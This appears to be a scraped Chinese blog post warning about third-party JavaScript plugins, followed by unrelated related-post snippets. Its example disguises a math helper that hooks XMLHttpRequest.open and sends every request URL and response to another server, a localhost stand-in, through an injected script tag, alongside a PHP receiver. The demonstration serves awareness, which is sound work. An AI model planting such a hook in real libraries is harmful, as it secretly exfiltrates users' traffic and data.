2. 程式人生 > >js外掛的安全問題

js外掛的安全問題

阿新 發佈:2018-12-10

js外掛的安全問題

01 說明

js的第三方是不安全的,無論是npm引入還是傳統引入,本文將通過一個例子,來說明不得隨意引入第三方js。

02 引入js

我們有一個場景,需要一個計算的js,於是我們引入了下面,程式碼math.js:

(function () {
  window.math = function(a, b) {
    return a + b;
  }
})();

上面程式碼是一個開源庫,但是問題來了。

03 問題

看下面程式碼,在math.js中,
可以通過悄無聲息的代理了我們的ajax物件。
並通過一個跨域請求傳送給了另一臺伺服器。
這樣我們所有的互動都可以被監控到。

(function (open) {
  window.math = function(a, b) {
    return a + b;
  }
  // 代理ajax方法
  XMLHttpRequest.prototype.open = function () {
    var args = arguments;
    this.addEventListener('readystatechange', function (data) {
      if (this.readyState === 4) {
        console.log(args);
        console.
 
log(this.responseText);
        // 獲取資料後傳送一個跨越請求
        var script = document.createElement('script');
        script.src = "http://localhost/phpCode/web/index.php?args="
          + encodeURIComponent(args[1])
          +'&response='+ this.responseText;
        document.head.append(script);
      }
    }
 
, false);
    open.apply(this, args);
  };


})(XMLHttpRequest.prototype.open);

另一臺伺服器程式碼:
伺服器,完全可以接受到互動資料。

<?php 

$args = $_GET['args'];
$response = $_GET['response'];

echo 'alert(1);';

 ?>

04 重視web安全

所以奉勸大家,少用外掛,注重安全。

相關推薦

js外掛安全問題

js外掛的安全問題 01 說明 js的第三方是不安全的,無論是npm引入還是傳統引入,本文將通過一個例子,來說明不得隨意引入第三方js。 02 引入js 我們有一個場景,需要一個計算的js,於是我們引入了下面,程式碼math.js: (function () {

利用js-xlsx.js外掛實現Excel檔案匯入並解析Excel資料成json資料格式

<!--本文轉載於網路,有太多一樣的文章,不知道原作者是哪位了,就不註明出處了。這裡記載下來,用於自己的學習借鑑--><!DOCTYPE html><html lang="en"><head> <meta charset="UTF-8">

非常漂亮的JS外掛--------scrollReveal.js – 頁面滾動顯示動畫JS(轉)

scrollReveal.js – 頁面滾動顯示動畫JS 簡介 和 WOW.js 一樣,scrollReveal.js 也是一款頁面滾動顯示動畫的 JavaScript,能讓頁面更加有趣,更吸引使用者眼球。不同的是 WOW.js 的動畫只播放一次,而 scrollReve

序列化表單js外掛

$.fn是指jquery的名稱空間,加上fn上的方法及屬性,會對jquery例項每一個有效。(實際就是使用了prototype,詳細可檢視jquery.js程式碼)  如擴充套件$.fn.abc()  那麼你可以這樣子:$("#div").abc(); $.fn.seria

eclipse安裝spket的js外掛(最新版本),親測可用

Spket IDE是目前支援Ext 2.0最為出色的IDE。 它採用.jsb project file 檔案並將繼承於基類和所有文件的內容嵌入到生成程式碼提示的Script doc中。 由於Spket只是一個單純的編輯器,沒有其它格式的支援(如CSS),所以我的做法是用它的Eclipse

ScrollReveal-元素隨頁面滾動產生動畫的js外掛

簡介 和 WOW.js 一樣,scrollReveal.js 也是一款頁面滾動顯示動畫的 JavaScript,能讓頁面更加有趣,更吸引使用者眼球。不同的是 WOW.js 的動畫只播放一次,而 scrollReveal.js 的動畫可以播放一次或無限次;WOW.js 依賴 animate.css,而 scr

10分鐘快速精通rollup.js——前置學習之rollup.js外掛

前言 本文是《10分鐘快速精通rollup.js——Vue.js原始碼打包過程深度分析》的前置學習教程,講解的知識點以理解Vue.js打包原始碼為目標,不會做過多地展開。教程將保持rollup.js系列教程的一貫風格,大部分知識點都將提供可執行的程式碼案例和實際執行的結果,讓大家通過教程就可以看到實現效果,

Vue.js 外掛

外掛 外掛通常會為 Vue 新增全域性功能。外掛的範圍沒有限制——一般有下面幾種: 新增全域性方法或者屬性,如: vue-custom-element 新增全域性資源:指令/過濾器/過渡等,如 vue-touch 通過全域性 mixin 方法新

easyui快捷鍵實現增刪改(jquery.hotkeys.js外掛)

第一步:下載 jquery.hotkeys.js外掛  http://plugins.jquery.com/hotkeys/ 第二步:js引入 <!-- jquery的按鍵擴充套件支援 --> <script type="text/jav

【常用 JS 外掛】01 jQuery Validation 表單驗證外掛

表單驗證框架 jQuery Validation 前端表單驗證框架 頁面引用 <!-- jQuery Validation 1.14.0 --> <script src="/static/assets/plugins/jquery-valida

前端繪製流程圖--流程圖JS外掛:dagre-d3

後臺返回的資料為WEBSOCKET實時推送 ,每推送一條資料來,自動生成一個分支和資料塊,一個子可能會對應多個父。 每個綠色方塊點選 出現對應的灰色方塊 效果圖如下:   html如下 <!doctype html> <head>

select2.js外掛支援拼音搜尋(最新版-4.0.6)

通過兩天的研究,學會使用select2.js,並且修改了select2.js的原始碼,實現拼音搜尋的功能(pinyin.js連結,將中文轉換成拼音),下面主要講解如何實現拼音搜尋功能: 1.從https://select2.org/官網上下載最新的select2.js,學習

轉:通過tableExport.js外掛來實現匯出Excel/Pdf/txt/json等

Jquery tableExcel.js下載地址:https://github.com/kayalshri/tableExport.jquery.plugin   tableExport.jquery.plugin 匯出的格式可以是:如下 JSON XML PNG CSV TXT SQL

SlwUi(Super Lightweight UI)前端js外掛菜單系列(3)右鍵選單SlwCtxMenu,導航選單SlwMenu

      今天介紹前端js外掛菜單系列(3)右鍵選單SlwCtxMenu,導航選單SlwMenu。 基於jQuery,瀏覽器相容(Browser Support) Internet Explore

angular4+ 引用外部js檔案,使用第三方js外掛

1.在tsconfig.json檔案裡找到compilerOptions屬性,在屬性裡面加個 “allowJs”: true。 2.將你的外部js檔案放到assets資料夾裡,找到 angular.json檔案,找到scripts配置js檔案路徑。 3.在src目錄下新建個檔案typin

酷炫loading載入js外掛layer_loading

Layer_loading 1、依賴包 layer.js,jquery.js,可自行搜尋下載。 2、使用方法 首先,下載,其次,引入layer_loading.css和layer_loading.

Node.js 外掛安裝及常用外掛

Node.js外掛安裝   Node.js常用外掛 >> TypeScript 本部落格為 TypeScript 而創造,不能少了 TypeScript。 http://www.typescriptlang.org/ 國內有個翻譯網站 https://www.ts

idea vue.js外掛安裝

Vue.js for IntelliJ IDEA-based IDEs This plugin provides support for Vue.js in IntelliJ IDEA Ultimate, WebStorm, PhpStorm, PyCharm Professional and RubyMi

第一個JS外掛——輪播圖

開發外掛,本人這裡採用的是模組化開發方式(Module),確保記憶體中只有一個物件引用,這樣可以節省記憶體,也可以使程式碼簡潔高效。 // 這裡採用()()這種自呼叫函式,形成閉包,內部函式是一個匿名函式,防止外掛使用者定義函式與外掛衝突。 (function(){ "use stri

HTML自適應字號JS外掛

背景 之前在專案中有遇到需要根據獲取文字的長度自適應顯示文字的需求,整理髮現這種需求在專案中多次遇到,所以考慮編寫一個通過的js外掛來實現。 使用 使用時只需要指定dom元素的寬度和高度,外掛會自動計算